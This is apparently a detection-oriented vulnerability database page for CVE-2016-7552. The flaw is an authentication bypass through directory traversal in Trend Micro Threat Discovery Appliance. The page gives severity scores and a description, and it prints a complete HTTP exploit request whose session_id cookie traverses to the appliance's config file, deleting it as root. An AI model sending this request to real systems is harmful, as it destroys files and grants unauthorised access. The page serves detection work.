🔙 목록으로 돌아가기

CVE-2016-7552: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass

TitleTrend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
Authordwisiswant0
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance.
RemediationApply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.92979
CVE IDCVE-2016-7552
CWE IDCWE-22
Tags cve2016 cve msf lfi auth bypass trendmicro vuln

🔍 Vulnerability Description

Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.

🌐 HTTP Request

GET /cgi-bin/logoff.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Accept: */*
Accept-Language: en
Cookie: session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-7552.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-7552.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A